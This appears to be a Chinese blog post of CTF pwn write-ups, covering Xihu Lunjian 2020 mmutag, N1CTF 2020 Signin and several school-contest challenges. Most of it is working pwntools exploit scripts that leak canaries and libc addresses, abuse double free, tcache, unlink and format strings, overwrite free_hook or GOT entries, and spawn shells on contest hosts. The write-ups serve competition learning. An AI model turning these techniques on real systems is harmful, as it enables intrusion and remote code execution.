0x00 前言

十月先是说走就走去了南京，打了天创杯，题目质量一言难尽

回来两天又被叫去南通参加工业互联网比赛，和iluem和iyzyi师傅一起得了一等奖

当天晚上八点打华为杯，成绩不错破了两万分

堆了好多作业没写，也没什么时间复现题目，贴下校赛wp水一篇博客

0x01 西湖论剑2020 mmutag

一道堆栈结合的题目， introduce函数存在栈溢出，可以先泄露canary，然后伪造fakechunk，double free将堆劫持到栈上，利用ROP泄露出libc基址，泄露出libc后就可以为所欲为了，有多种思路

这是此时的栈结构

exp

1.利用ret2csu(或者构造rop)，调用read函数，利用ropgetshell

# encoding=utf-8
from pwn import *
elf = ELF('./mmutag')
p = elf.process()
# p = remote('183.129.189.62', 58704)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
one_gadget = [0x45226, 0x4527a, 0xf0364, 0xf1207]

def read_introduce1(introduce):
    p.sendlineafter("input your choice:\n\n", "1")
    p.sendafter("your introduce \n", introduce)

def introduce():
    p.sendlineafter("input your choice:\n\n", "2")

def add(index, content):
    p.sendlineafter("your choise:\n", "1")
    p.sendlineafter("your id:\n", str(index))
    p.sendafter("your content\n", content)

def delete(index):
    p.sendlineafter("your choise:\n", "2")
    p.sendlineafter("your id:\n", str(index))

def stack_leak(content):
    p.sendlineafter("your choise:\n", "3")
    p.send(content)

poprdi = 0x0000000000400d23

p.recvuntil("input you name: \n")
p.sendline("ld1ng")
p.recvuntil("your tag: ")
stack_address = int(p.recvuntil(":", drop=True), 16)
log.success("stack address {}".format(hex(stack_address)))
#read_introduce1(p64(0x71))
introduce()
stack_leak("1"*0x19)
p.recvuntil("Your content: ")
p.recvuntil("1"*0x18)
canary = u64(p.recv(8)) - ord("1")# leak canary
log.success("canary {}".format(hex(canary)))
stack_leak(p64(0) + p64(0x71) + p64(0)+'\x00')#build fake chunk , end of canary->00
add(1,'ld1ng')
add(2,'ld1ng')
delete(1)
delete(2)
delete(1) # double free
add(3, p64(stack_address - 0x40))# fd->fake chunk
add(5,'ld1ng')
add(6,'ld1ng')
#gdb.attach(p)
payload = b"a"*0x8 + p64(canary)
payload += p64(stack_address + 0x10)
payload += p64(poprdi) + p64(elf.got['puts']) + p64(elf.plt['puts'])
payload += p64(0x400D1C)#__libc_csu_init
payload += p64(elf.got['read']) + p64(0x80) + p64(stack_address+0x28) + p64(0)
payload += p64(0x400d00) #ret2csu
add(7, payload)
#gdb.attach(p)
p.sendlineafter("your choise:\n", "4")# trigger bug

libc.address = u64(p.recvline().strip(b"\n").ljust(8, b"\x00")) - libc.sym['puts']
log.success("libc address {}".format(hex(libc.address)))
# str_sh = libc.search(b"/bin/sh\x00").next()
# log.success("str_bin/sh {}".format(hex(str_sh)))
# payload = p64(poprdi) + p64(str_sh)
# payload += p64(libc.sym['system'])
onegadget = libc.address + one_gadget[1]
log.success("one:" + hex(onegadget))
payload = p64(onegadget)
p.send(payload)
# pause()
p.interactive()

2.老方法，利用malloc_hook和realloc_hook

libc_base = u64(p.recv(6).ljust(8,'\x00')) - 240 - libc.sym['__libc_start_main']
log.info("LIBC:\t"+ hex(libc_base))
free(2)
free(1)
free(2)
rce = libc_base + 0x4527A
realloc = libc_base + libc.sym['realloc']
malloc_hook = libc_base + libc.sym['__malloc_hook']
new(7,p64(malloc_hook - 0x23))
new(8,"UUUU")
new(9,'UUUU')
new(10,'\x00'*(0x13 - 8) + p64(rce) + p64(realloc + 4))
free(1)
free(1)
p.interactive()

3.两次double free 两次rop

#leak libc_base
puts_addr=u64(sh.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
libc_base=puts_addr-libc.symbols["puts"]
system_addr=libc_base+libc.symbols["system"]
binsh=libc_base+libc.search("/bin/sh").next()
info("libc_base:0x%x",libc_base)

#try again
sh.recvuntil("please input your choise:")
sh.sendline("3")
payload=p64(0)+p64(0x71)
sh.sendline(payload)
delete(1)
delete(2)
delete(1)
payload=p64(stack_addr-0x20)
add(7,payload)
add(8,'cccc')
add(9,'dddd')
payload="a"*8+p64(canary)
payload+="b"*8+p64(poprdi)+p64(binsh)
payload+=p64(system_addr)+p64(main)
add(10,payload)
sh.recvuntil("please input your choise:")
sh.sendline("4")
sh.interactive()

4.利用read覆盖atoi@GOT

因此ROP链为：

puts(puts@GOT)泄露libc地址

read(0, atoi@GOT, …)劫持GOT

返回到ReadInt触发system

exp = p64(0) #fd
exp+= p64(canary)
exp+= p64(buf)
exp+= p64(elf.got['puts'])
exp+= p64(elf.plt['puts']) #puts(puts@GOT)
exp+= p64(0x400d23) #pop rdi ; ret
exp+= p64(0) #STDIN
exp+= p64(0x400d21) #pop rsi ; pop r15 ; ret
exp+= p64(elf.got['atoi'])
exp+= p64(0)
exp+= p64(elf.plt['read']) #read(STDIN, atoi@GOT, ...)
exp+= p64(0x400942) # Read option
Add(6, exp)
Leave() #trigger
puts_addr = u64(sh.recv(6).ljust(8, '\x00'))
libc.address = puts_addr - libc.symbols['puts']
log.success('libc base = '+hex(libc.address))
sh.send(p64(libc.symbols['system'])) #atoi@GOT = system@LIBC
sh.sendline('/bin/sh')
sh.interactive()

…你学废了吗

c++完全读不懂，全靠动调分析程序，用的vector

bss段储存内存块 1 2 信息的3个指针

指针1和3是一个边界指针，指针2是数据编辑指针。根据指针2处来写number数据。

当指针2大小超过指针3，其就会申请一块新的内存，其申请完内存大小是以0x20,0x20,0x30,0x50,0x90,0x110,0x210,0x410,0x810,0x1010 这样递增。

申请完新内存，会把上一块chunk free，并把上一块内存中的number值进行拷贝到新申请的内存中。并且会根据申请到的chunk地址，进行对bss段3个指针的更新

exp

思路add多次绕过tcache，通过unsortedbin泄露libc基址

最后接着free，让指针2指向0x20的fd处，修改其为free hook ，并改为system，再次free触发漏洞

from pwn import *
s = process("./signin")
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
def add(idx,num):
	s.sendlineafter(">>","1")
	s.sendlineafter("Index:",str(idx))
	s.sendlineafter("Number:",str(num))
def free(idx):
	s.sendlineafter(">>","2")
	s.sendlineafter("Index:",str(idx))
def show(idx):
	s.sendlineafter(">>","3")
	s.sendlineafter("Index:",str(idx))
for i in range(0x101):
	add(1,1)
for i in range(0x202):
	free(1)
show(1)
libc_base = int(s.recv(15),10)- 0x70 - libc.sym['__malloc_hook']
info(hex(libc_base))
free_hook = libc.sym['__free_hook'] + libc_base
system = libc_base + libc.sym['system']
info(hex(system))
for i in range(0x10d):
	free(1)
show(1)
add(1,free_hook-0x8)
add(2,u64("/bin/sh\x00"))
add(2,system)
s.interactive()

0x03 CUMTCTF

我习惯每次都用ubuntu16.4在本地做，比赛libc是2.27，往往需要大改，校赛题目改exp比写的时间还长！￣へ￣

远程连接超时，可能是system没对齐的原因，当时没考虑太多直接采用蠢比写法。。

from pwn import *
elf = ELF('./login')
#p = elf.process()
#context.log_level = 'debug'
p = remote('219.219.61.234', 10000)
sys = 0x4006F0
bssaddr = elf.bss()
p.recvuntil("choice:")
p.sendline('1')
p.recvuntil("username")
p.sendline('cat flag')
p.recvuntil("password")
payload = 'a'*0x40 + 'b'*0x8 + p64(0x400be3) + p64(0) + p64(0x400be1) + p64(bssaddr) + p64(0) + p64(elf.sym['read']) + p64(0x400A36)
p.sendline(payload)
p.sendline('cat flag')
p.recvuntil("username(length less than 20):")
p.sendline('123456')
p.recvuntil("password(length less than 20):")
payload = 'a'*0x40 + 'b'*0x8  + p64(0x400be3) + p64(bssaddr) + p64(sys) + p64(0x0400AF9)
p.sendline(payload)
#pause()
p.interactive()

longlong型(64位)和int型(32位)，整数溢出

from pwn import *
elf = ELF('./login')
#p = elf.process()
#context.log_level = 'debug'
p = remote('219.219.61.234', 10001)
sys = 0x4006F0
bssaddr = elf.bss()
p.recvuntil("choice:")
p.sendline('1')
p.recvuntil('Enter your id!')
payload = pow(2,32)
print payload
p.sendline('4294967296')
# p.recvuntil('Enter your id!')
# p.sendline('0')
# p.recvuntil("username(length less than 20)")
# p.send('test')
# p.recvuntil("password(length less than 20)")
# gdb.attach(p)
# p.send('a'*0x18 + p64(0x6011D0))
# p.send('test')

p.interactive()

bss段写shellcode，ret2bss

ROP的方法打不通不明原因…

from pwn import *
elf = ELF('./login''')
#p = elf.process()
p = remote('219.219.61.234',10004)
#context.log_level = 'debug'
context(arch = 'amd64',os = 'linux')
#libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
libc = ELF('libc-2.27.so')
shellcode = asm(shellcraft.sh())
addr = 0x601060
p.recvuntil("username:")
p.sendline(shellcode)
payload='pwnht'.ljust(0x10,'\x00') + 'b'*8 + p64(addr)
#p.recvuntil('password:')
p.sendline(payload)
p.interactive()

0x03 note_service

泄露libc基址，栈地址和返回地址，格式化字符串任意地址写

from pwn import *
elf = ELF('./note_service')
context(arch='amd64',os='linux')
#p = elf.process()
context.log_level = 'debug'
p = remote('219.219.61.234', 10002)
libc = ELF('libc-2.27.so')
onegadget = [0x4f2c5, 0x4f322,0x10a38c,0xf1207]
def leak(con):
    p.recvuntil('input your note:')
    p.sendline(str(con))
    p.recvuntil("is:")
    mm = int(p.recvuntil("-").strip('-'),16)
    p.recvuntil('????')
    p.sendline('123')
    return mm
p.recvuntil('input your name:')
p.sendline('ld1ng')
stack = leak("%38$p-") - 0xd8
info("libc + 240:" + hex(stack))
canary = leak('%39$p-')
info("canary:" + hex(canary))
libc_base = leak('%41$p-') - 231 -libc.sym['__libc_start_main']
info("libc_base:" + hex(libc_base))
one_gadget = libc_base + onegadget[0]
payload = fmtstr_payload(6,{stack:one_gadget})
p.recvuntil('note:')
p.sendline(payload)
p.recv()
p.recvuntil('????')
p.sendline('yes')
#gdb.attach(p)
p.interactive()

0x04 messagesystem

tcache + unlink，改写free_got为system

哇ubuntu16.4做出来之后才得知是libc2.27，改了好久

#coding=utf-8
from pwn import *
#context.log_level='debug'
#sh=process("./messagesystem")
context(arch='amd64',os='linux')
sh = remote('219.219.61.234', 10003)
libc=ELF("libc-2.27.so")
#libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
#og = [0x4f2c5,0x4f322,0x10a38c]
def add(idx,size,content):
    sh.recvuntil("choice:")
    sh.sendline(str(1))
    sh.recvuntil('Now Leave Message!')
    sh.sendline(str(idx))
    sh.recvuntil("want to leave?")
    sh.sendline(str(size))
    sh.recvuntil("want to say?")
    sh.send(content)

def edit(idx,content):
	sh.recvuntil("choice:")
	sh.sendline(str(4))
	sh.recvuntil("want to edit?")
	sh.sendline(str(idx))
	sh.recvuntil("enter your Message!")
	sh.send(content)

def show(idx):
	sh.recvuntil("choice:")
	sh.sendline(str(2))
	sh.recvuntil("want to show?")
	sh.sendline(str(idx))

def delete(idx):
	sh.recvuntil("choice: ")
	sh.sendline(str(3))
	sh.recvuntil("want to delete?")
	sh.sendline(str(idx))

add(0,136,'a'*16)
add(1,136,'b'*8)
add(2,136,'c'*8)
add(3,136,'/bin/sh')
add(4,136,'e'*8)
add(5,136,'a')
add(6,136,'a')
add(7,136,'a')
add(8,136,'a')
add(9,136,'a')
add(10,136,'a')
add(11,136,'a')
delete(0)
delete(1)
delete(2)
delete(3)
delete(4)
delete(5)
delete(6)
delete(7)
add(7,130,p8(0xa0))
add(6,130,p8(0xa0))
add(5,130,p8(0xa0))
add(4,130,p8(0xa0))
add(3,130,'cat flag')
add(2,130,p8(0xa0))
add(1,130,p8(0xa0))
add(0,130,p8(0xa0))
show(0)
sh.recv()
# uu64(sh.recv(6))
#libc_base = u64(sh.recv(7).ljust(8,'\x00'))-0x70-libc.sym['__malloc_hook']
libc_base = u64(sh.recvuntil('\x7f')[-6:] + '\x00\x00')-0x70-libc.sym['__malloc_hook']
info("libc_base:" + hex(libc_base))

delete(5)
delete(6)
delete(7)
delete(8)
delete(9)
delete(10)
delete(11)
payload = p64(0)+p64(8)+p64(0x601568-0x8*3) + p64(0x601568-0x8*2)+ 0x60*'A'
payload += p64(0x80)+ p64(0x90)
delete(1)

add(11,130,'e'*8)
add(10,130,'a')
add(9,130,'a')
add(8,130,'a')
add(7,130,'a')
add(6,130,'a')
add(5,130,'a')
add(1,130,payload)
delete(5)
delete(6)
delete(7)
delete(8)
delete(9)
delete(10)
delete(11)
delete(2)
payload = 'a'*0x10 + p64(0x601480)
edit(1,payload)
#
#onegadget = libc_base + og[3]
system0 = libc_base + libc.sym['system']
info(hex(system0))
#info(hex(onegadget))

edit(0,p64(system0))
#gdb.attach(sh)
delete(3)
#
sh.interactive()

0x05 messagesystem_plus

阿这。。感觉是非预期，同样的脚本稍微改一改就能用

#coding=utf-8
from pwn import *
#context.log_level='debug'
sh=process("./messageSystem_plus")
#sh = remote('219.219.61.234', 10005)
libc=ELF("libc-2.27.so")
#libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
#og = [0x4f2c5,0x4f322,0x10a38c,0xf1207]
#og = [0x4f2c5,0x4f322,0x10a38c]
def add(idx,size,content):
    sh.recvuntil("choice:")
    sh.sendline(str(1))
    sh.recvuntil('Now Leave Message!')
    sh.sendline(str(idx))
    sh.recvuntil("want to leave?")
    sh.sendline(str(size))
    sh.recvuntil("want to say?")
    sh.send(content)

def edit(idx,content):
	sh.recvuntil("choice:")
	sh.sendline(str(4))
	sh.recvuntil("want to edit?")
	sh.sendline(str(idx))
	sh.recvuntil("enter your Message!")
	sh.send(content)

def show(idx):
	sh.recvuntil("choice:")
	sh.sendline(str(2))
	sh.recvuntil("want to show?")
	sh.sendline(str(idx))

def delete(idx):
    sh.recvuntil("choice: ")
    sh.sendline(str(3))
    sh.recvuntil("Single Message")
    sh.sendline(str(2))
    sh.recvuntil("you want to delete?")
    sh.sendline(str(idx))

add(0,136,'a'*16)
add(1,136,'b'*8)
add(2,136,'c'*8)
add(3,136,'/bin/sh')
add(4,136,'e'*8)
add(5,136,'a')
add(6,136,'a')
add(7,136,'a')
add(8,136,'a')
add(9,136,'a')
add(10,136,'a')
add(11,136,'a')
delete(0)
delete(1)
delete(2)
delete(3)
delete(4)
delete(5)
delete(6)
delete(7)
add(7,130,p8(0xa0))
add(6,130,p8(0xa0))
add(5,130,p8(0xa0))
add(4,130,p8(0xa0))
add(3,130,'cat flag')
add(2,130,p8(0xa0))
add(1,130,p8(0xa0))
add(0,130,p8(0xa0))

show(0)
sh.recv()
# uu64(sh.recv(6))
#libc_base = u64(sh.recv(7).ljust(8,'\x00'))-0x70-libc.sym['__malloc_hook']
libc_base = u64(sh.recvuntil('\x7f')[-6:] + '\x00\x00')-0x70-libc.sym['__malloc_hook']
info("libc_base:" + hex(libc_base))
#gdb.attach(sh)
delete(5)
delete(6)
delete(7)
delete(8)
delete(9)
delete(10)
delete(11)
payload = p64(0)+p64(8)+p64(0x6017a8-0x8*3) + p64(0x6017a8-0x8*2)+ 0x60*'A'
payload += p64(0x80)+ p64(0x90)
delete(1)

add(11,130,'e'*8)
add(10,130,'a')
add(9,130,'a')
add(8,130,'a')
add(7,130,'a')
add(6,130,'a')
add(5,130,'a')
add(1,130,payload)
#gdb.attach(sh)
delete(5)
delete(6)
delete(7)
delete(8)
delete(9)
delete(10)
delete(11)
delete(2)
payload = 'a'*0x10 + p64(0x6016a8)#free_go
edit(1,payload)
#onegadget = libc_base + og[1]
system0 = libc_base + libc.sym['system']
info(hex(system0))
#info(hex(onegadget))

edit(0,p64(system0))
#gdb.attach(sh)
delete(3)
#
sh.interactive()

0x06 mail_service

tcache + uaf ，劫持free_hook为onegadget

from pwn import *
# context(arch='amd64',os='linux')
# context.log_level='debug'
#sh=process("./mail_service")
sh = remote('219.219.61.234', 10006)
libc=ELF("libc-2.27.so")
# libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
og = [0x4f2c5,0x4f322,0x10a38c]
def reg():
    sh.recvuntil("your choice:")
    sh.sendline(str(1))
    sh.recvuntil("input your name:")
    sh.sendline('ld1ng')
    sh.recvuntil("input your password:")
    sh.sendline('123')

def login():
    sh.recvuntil("your choice:")
    sh.sendline(str(2))
    sh.recvuntil("input your name:")
    sh.sendline('ld1ng')
    sh.recvuntil("input your password:")
    sh.sendline('123')

def add(idx,size,content):
    sh.recvuntil("choice:")
    sh.sendline(str(1))
    sh.recvuntil('your mail index:')
    sh.sendline(str(idx))
    sh.recvuntil('input your receiver:')
    sh.sendline('')
    sh.recvuntil('input your title:')
    sh.sendline('')
    sh.recvuntil("input your mail length:")
    sh.sendline(str(size))
    sh.recvuntil("input your mail context:")
    sh.send(content)

def edit(idx,content):
    sh.recvuntil("choice:")
    sh.sendline(str(4))
    sh.recvuntil("your mail index:")
    sh.sendline(str(idx))
    sh.recvuntil('input your receiver:')
    sh.sendline('')
    sh.recvuntil('input your title:')
    sh.sendline('')
    sh.recvuntil("input your mail context:")
    sh.send(content)

def show(idx):
	sh.recvuntil("choice:")
	sh.sendline(str(2))
	sh.recvuntil("your mail index:")
	sh.sendline(str(idx))

def delete(idx):
	sh.recvuntil("choice:")
	sh.sendline(str(3))
	sh.recvuntil("your mail index:")
	sh.sendline(str(idx))

reg()
login()
for i in range(10):
    add(i,144,'aaa')
for i in range(7):
    delete(i)
delete(7)
for i in range(6,-1,-1):
    add(i,144,'aaa')
add(7,144,'a'*8)
show(7)
sh.recvuntil('a'*8)
libc_base = u64(sh.recvuntil('\x7f')[-6:] + '\x00\x00')-0x70-libc.sym['__malloc_hook']
info(hex(libc_base))
onegadget = libc_base + og[1]
info(hex(onegadget))
malloc_hook = libc_base + libc.sym['__malloc_hook']
free_hook = libc_base + libc.sym['__free_hook']
system = libc_base + libc.sym['system']
info(hex(free_hook))
fake_chunk = malloc_hook - 0x23
#payload = '\x00'*(0x23-8) + p64(onegadget)
info(hex(fake_chunk))
delete(1)
delete(0)
edit(0, p64(free_hook)+p64(free_hook))
edit(2,'cat flag')
add(12, 144, 'A'*0x10)
add(13,140,p64(onegadget))
delete(2)
#gdb.attach(sh,"b *$rebase(0x202060)")
sh.interactive()

0x07 safe_vpn

真非预期，学长说环境没配好，只要有人nc，admin.txt就自动清空，不知道是什么原因

白给题

from pwn import *
elf  = ELF('./vpn')
#context.log_level = 'debug'
#io = process(local_file)
io = remote('219.219.61.234', 20007)
libc = ELF('libc-2.27.so')
context.arch = elf.arch
io.sendafter('name','\x00')
io.sendafter('password','\x00')
io.interactive()

0x04 小结

十月总结：太菜了…

0x00 前言

0x01 西湖论剑2020 mmutag

exp

0x02 N1CTF2020 Signin

exp